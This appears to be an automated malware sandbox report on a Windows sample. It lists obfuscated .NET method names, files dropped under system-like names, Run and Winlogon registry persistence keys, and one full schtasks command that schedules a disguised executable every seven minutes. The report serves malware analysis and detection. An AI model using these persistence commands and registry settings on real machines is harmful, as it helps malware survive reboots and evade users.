                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, lvWI7xYujmbx7Kfbavk.csHigh entropy of concatenated method names: 'f7UYpIlaPo', 'hSyYRKjEgT', 'z6LvhO268wxCSVOqw8Km', 'lXEjb226eUXWmJPo3Wve', 'DEOQTb26ngeW7ybq0lvp', 'UB5YBsu6ld', 'hBXYiErERl', 'rUMYJAL9xj', 'lUeYc2TIh8', 'ihIYFvC5P9'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, mGYX6iCuyYEBASY6hNx.csHigh entropy of concatenated method names: 'nhKCxDsY8Z', 'i55CzkmekL', 'I6ACBaepAM', 'VCPCia8kS4', 'UMMCJiMLBc', 'BLZCcxnnrY', 'DmdCFnhNcU', 'LvsC3fk8YM', 'GV0CbgXUJ3', 'meZCVkH4iS'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, ickxQJaDDBQq2kyr7h1.csHigh entropy of concatenated method names: 'vdlQlPBX5u', 'r9M1NI2V0wmaVh17eyDt', 'xkC5kh2VyhABJgTTYZjh', 'Ae9Jat2Vmhw8RFclDfMH', 'kt5', 'y42aE2mEuN', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, zTgVwif1xxQVT7Abbau.csHigh entropy of concatenated method names: 'GJS1YP2pYrxfXi1SN0Hx', 'Gj47472pdKirXtpY1qfJ', 'iAJexY2pmiBL1hOIC8ME', 'BFKI9r2p08nfihUOrQto', 'h2oxmo2p2G2yjTadYM14', 'URwjha2pIJvIw5mCh4eH', 'kq2GS22pgGYmNffvGyIe', 'jpdlSJ25zl5tsWwYAEKg', 'a1VCiA2pZuWB7lh37ICo'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, MtSm9esiSKvHPIrjjtM.csHigh entropy of concatenated method names: 'HykscUm8Id', 'siLsFiSlXF', 'sYws3KMXSH', 'wGRsb0UtBZ', 'LpasVgi1Ti', 'ArjWiq234PckUFaJXnwO', 'JHGZOD23zR9nUPb0d09p', 'XRx624237G5oGDorbPO3', 'WN7Dcs23xB4D5x2WsbWq', 'HObF1V2bZAanqsOvMosX'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, f8IvbHWnBDwhCWcDD1c.csHigh entropy of concatenated method names: 'GsRo2k0xLk', 'x2fOac2BhkmQfc22lohm', 'hRb8XR2BfdtnajNSNSq7', 'LhWsQ42BuOHaluXdBIdE', 'yt1qi12BBQ6jdJNN588p', 'MJtWGAwCM1', 'FcxWLjQDxp', 'QVnWOUyohy', 'UCuWNx3eDk', 'IG1WTGUGwP'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, Ty1fK4qIF8ERWMLx1Lt.csHigh entropy of concatenated method names: 'q4mqyNNF4I', 'XHJqmLFYbd', 'GOAq0JOXKr', 'babqYsBqD6', 'f1WqdUb5n1', 'aWcqqC3qn8', 'otgqUmosnI', 'gkPq82gG7g', 'uaYqemNWXY', 'dfxqn7OD7w'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, Srks6KmLr7VhKT28xeW.csHigh entropy of concatenated method names: 'k0xmC1Gmvx', 'ChfmPxEVda', 'S43mwbmUY6', 'wEeALm2viomtmGuyhZQs', 'AcnQcB2vJCsgBasoccKj', 'TZpxoG2vhaswYRm9plC3', 'r4oTg12vByIifZsuAbva', 'v0lmo5KNkv', 'uphmHncp6V', 'XoIlFZ2vSFnpjAvyAbLb'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, WVhPeoCgOpZmtleEi2F.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'rUMCmvhann', 'Write', 'd7ZC0QZ1CR', 'CGSCYkZ6CV', 'Flush', 'vl7'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, osnNcFD8crq3ekDOJi3.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'zFr2dWmZp01', 'sM02dEPCDBF', 'wUd7ZX2hdJ97TYZTZIuJ', 'xXRHns2hqlhfURX4cXqO', 'H63gvZ2hUZ7QuaF0njtb', 'skN6Rj2h8GiVH8AioKV1', 'qMC26A2he8F5ZLo9Befs', 'w6ta4R2hn4LqDUixF4W7'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, QSv13CImiI5o3mmfKnV.csHigh entropy of concatenated method names: 'tA0IYl1i7Z', 'B4XIdKN6qs', 'gscIqEL90D', 'CrYIUL2XL1', 'iJZfSr2PGQaY4sGiBCkR', 'S62RJf2Pn3LrGSdgUWMD', 'eYt4IL2PlN0LSChYDIPw', 'MDqinf2PLE5psvwX86wx', 'scCZQf2POADamm3I6BMb', 'sK3e8N2PN5GR0R1j2IG2'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, J8AjFSQbgy1ZtjU95ZZ.csHigh entropy of concatenated method names: 'bXFQrZZZ5A', 'k6r', 'ueK', 'QH3', 'nASQke2j4Q', 'Flush', 'Rk3Q5BP84x', 'tZGQpCFD4s', 'Write', 'kwOQRewNRc'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, TbjJIF2kdl3JWNwk36X.csHigh entropy of concatenated method names: 'P9X', 'HLj2pRrceP', 'eC52dZea1VQ', 'imethod_0', 'ltC2R0X7Wp', 'qZZCIS2CRUYY8pPIVVb4', 'nLHAmZ2C5RlHbk6OJ7cP', 'SpOV0y2CpSQdcNMGJ3qG', 'fxAhCo2C7lD5PE4aAE7D', 'F2mNBe2CxATVPJdRnmf0'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, l88VT8Q1eosOgU4Enya.csHigh entropy of concatenated method names: 'Close', 'qL6', 'Fs4QMoXri8', 'iDMQtCrYlF', 'prMQSgpEJ7', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, UmFSJMm6svgqXUgq77G.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'Tmh2y8GhyZ2', 'USlmK0iSCK', 'imethod_0', 'fVsdFo2vF4WRMfA9I6jn', 'qTR17O2v3pXZsnlqjs6T', 'MWJXLW2vb5rxCp4D4uFG', 'vb6tnY2vVv7uNCPZRnDL'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, KBvrI5gbSMVIjV5IF6m.csHigh entropy of concatenated method names: 'WItyg1lQp9', 'baGyyiY4pC', 'KkPymrjayQ', 'PoZnTJ2sdOZymuop8i02', 'Ofu7PR2sqtNBFwNV9svP', 'Qwiq1Z2s0lj6WNXWstZI', 'Ra0OUd2sYdTTpm2xjmev', 'Sidy8yCGjC', 'HjcTe72sn5tIuPN80Alu', 'UQWLi62s8yZoKk9TYKwy'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, wxbAwPkMW7gI8omkVtq.csHigh entropy of concatenated method names: 'RYx2d9MgONc', 'BpD20jLs5kC', 'aPMiTm2Ro70W9ph5oNKM', 'OJXWDF2RHEpRVRmnypE0', 'PwfA272RjBSvhEig2Eyq', 'B1BWfN2RwqRjEkZfJ6X5', 'MrDinx2RCS8dRiuou2ux', 'zOTTP52RPiOLd7B7pB5v', 'ovrnuu2Rsr08e41QJPUW', 'imethod_0'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, oJicmhjo50K8qHAg9l5.csHigh entropy of concatenated method names: 'zR0jjdwr9Z', 'Olyj9lKfKp', 'JSkjCbhI8B', 'YIKjPLET63', 'XvBjwqyK5J', 'uo0IOD2JmVPFgL1Kvlwj', 'QcTsYj2Jg1MgkNCAyrvJ', 'cfBNg32Jyj6UOHuhnNaq', 'GThrVW2J00qLpsVGLB4s', 'fICpVO2JYtqgyd35sgbY'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, hvGrHVpnySCR8498IJ5.csHigh entropy of concatenated method names: 'rXvpLAJGP7', 'Cm0pAFxrOb', 'FYmpWmHpeP', 'yvgpEDswuY', 'seHpoqIDSO', 'ExZpHsQCGY', 'maepjRPDQg', 'Qsfp9FeXKx', 'Dispose', 'XPeKWP27ooC6tyHxB4hG'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, Qw9CqYYvAejBEmRufXZ.csHigh entropy of concatenated method names: 'eHvYQJaS6G', 'iX1Y6LG8iL', 'HSQDbw2Q5SolIpOw8nVZ', 'sDaxEl2QrGu1lNI3pgFe', 'MKh83f2Qk6hunbr7e6TU', 'uBf2r12Qpmg5K9PNdc04', 'gVjvn82QRp48TvjofJuN', 'giT6rR2Q7el5hNDmO7vh', 'hbIWyv2QxWCUF6WYkfIs', 'KsD8wi2Q4ZAiXmtynQIC'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, Wef3LRSRuk2qZthm7AQ.csHigh entropy of concatenated method names: 'HVISxruFRR', 'ErtS4wgXC9', 'c3eSznERCa', 'eYWfZHSxxd', 'q6Wf2wSTOV', 'O3WfInmXS6', 'mYffgkOkXD', 'XX0fydmgU5', 'UoefmonZiY', 'ImWf0FYMbI'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, CdGxl9RZVebOvqn1fR2.csHigh entropy of concatenated method names: 'qKSRywXS4r', 'vQmRmbITYd', 'MjJQBB274B0UZF66cQrr', 'uviEBY27zlTO3YgwK5WI', 'glAqKB277FvE47hm74NV', 'WldPqk27xdqw1Cg91rn7', 'HmSand2xZwVtJ11w392B', 'QRadAZ2x22rwUsMKNrYB', 'LwWRIpxUwd', 'qeH9vU275XkJ429SGvBS'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, tWAlNqmVNgUWWeH9W0U.csHigh entropy of concatenated method names: 'Ogrm7maFCk', 'ES4mxZDaBJ', 'Kf1m4vDLfo', 'ABxmzluil0', 'j8U0ZSNGxP', 'CgI02S5ffX', 'gAN0Ia1RCj', 'Q5y0yn2aGtGsr1W0oJ7n', 'QlBAyw2aLlN8fraTTL04', 'KdnOEp2anV8lunDMk0lj'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, AYyCBEqohmwSlkGM8BU.csHigh entropy of concatenated method names: 'RysfIe2MtDZQ05kx20tu', 'KDlFsd2MKwuGwjdcPixl', 'JeNUdR2MMdcRugR7Wfps', 'g4Tl43yM9R', 'K22LUw2MhZv6JUSTOeI7', 'y777TT2MfMsPAeekDiUV', 'wmTUF62MuGRA73p9RbHL', 'v45RoI2MBVUBRRkMYxqh', 'pBC8ff2Mix6Z2Zqwcgff', 'SDvG2eXY8S'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, toAgKoSvsd0ZJTpNnEf.csHigh entropy of concatenated method names: 'oa4SQreZ8h', 'jC7S6YL4EM', 'iFKS1jScaw', 'kYISK8oP3F', 'llwSMcqUul', 'j3yStKNqEJ', 'aTmSS21Oei', 'Mo1SfglcBw', 'oeJSuMJxuq', 'nmeShqX25M'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, SKkjl9HBD3XZtOdS2g3.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'SYUHJfLcxk', 'lrjHcO2XTX', 'Dispose', 'D31', 'wNK'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, uZdxmFG8NuuI38Ruyk4.csHigh entropy of concatenated method names: 'Dispose', 'dPEGnHkGOk', 'fvUGlmIx1y', 'dPRGGSWvrP', 'b2a2IJ2MzOUGVwTh1tZu', 'xZnsRQ2tZKIh0nS69RBH', 'nY5mlQ2t2Mkhp6P3FhQT', 'dE7ixJ2tITBB657kwlV9', 'TCpHqK2tgyFZBWtXb28g', 'JV2Dn12tyncPQI6lMybA'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, VHlclS0HsxGII7KaSfm.csHigh entropy of concatenated method names: 'lJm0vUl6Df', 'OX1M142auvcSbFa16QmZ', 'cVTlo42aSfXlY2cxKg6X', 'aeWpDP2afeQ2XU443Wf4', 'yUfUEx2ahiaRs36kBVAd', 'gD0r712aBGwJX1o9ohk7', 'E94', 'P9X', 'vmethod_0', 'UDs2yXk6wAp'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, qRwlJgg9vDq0cYJUawU.csHigh entropy of concatenated method names: 'Ju7gh7AxGA', 'WvIgBOekXX', 'Uqcgix4UcR', 'fEaLex2wFowfnNckyi6O', 'JLYdJO2w3fQP5Atis6w3', 't4ex1s2wJmqR0g2fDXK8', 'yLOqkT2wc2B7wbTJNZGX', 'pmVgPkuDot', 'qDrgwLXESH', 'G6FgsQrT81'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, XC2FdV24h7kCEdrpBjD.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'Gah2d2WdfGT', 'K7V2y23yiSC', 'XvjGqe2PZ45mU5hCoHsR', 'mfVUTg2P2TMCWKDxh3Cq', 'akcySj2PIgVBeSebpOxE', 'RC4YST2Pg8mjcMhXkyKM'
                                    Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, AVpsF7xTGAI35np3icj.csHigh entropy of concatenated method names: 'nyYxwlXrXg', 'Ib8xsiqNff', 'fUPxv2tthl', 'LrgxakWbch', 'n5yxQc7EK0', 'V5Tx6Z63gY', 'Lvmx1bTW3P', 'tmfxK3eBJx', 'krnxMcALRT', 'u2IxtYXyPL'

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops PE files with benign system names
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Recovery\dwm.exeJump to dropped file
                                    Drops executables to the windows directory (C:\Windows) and starts them
                                    Source: unknownExecutable created and started: C:\Windows\Resources\Themes\smartscreen.exe
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Windows\Resources\Themes\smartscreen.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Users\user\Desktop\kwWqKlvO.logJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Recovery\dwm.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\ComproviderComponentIntocommon\ctfmon.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeFile created: C:\ComproviderComponentIntocommon\Portsessionsvc.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeJump to dropped file
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeFile created: C:\Users\user\Desktop\etRRuFlx.logJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Windows\Resources\Themes\smartscreen.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeFile created: C:\Users\user\Desktop\kwWqKlvO.logJump to dropped file
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeFile created: C:\Users\user\Desktop\etRRuFlx.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an autostart registry key pointing to binary in C:\Windows
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                                    Creates an undocumented autostart registry key
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PortsessionsvcJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Themes\smartscreen.exe'" /f
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smartscreenJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PortsessionsvcJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PortsessionsvcJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PortsessionsvcJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PortsessionsvcJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iEIWJugOSvvEyboGDFYpQJump to behavior
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
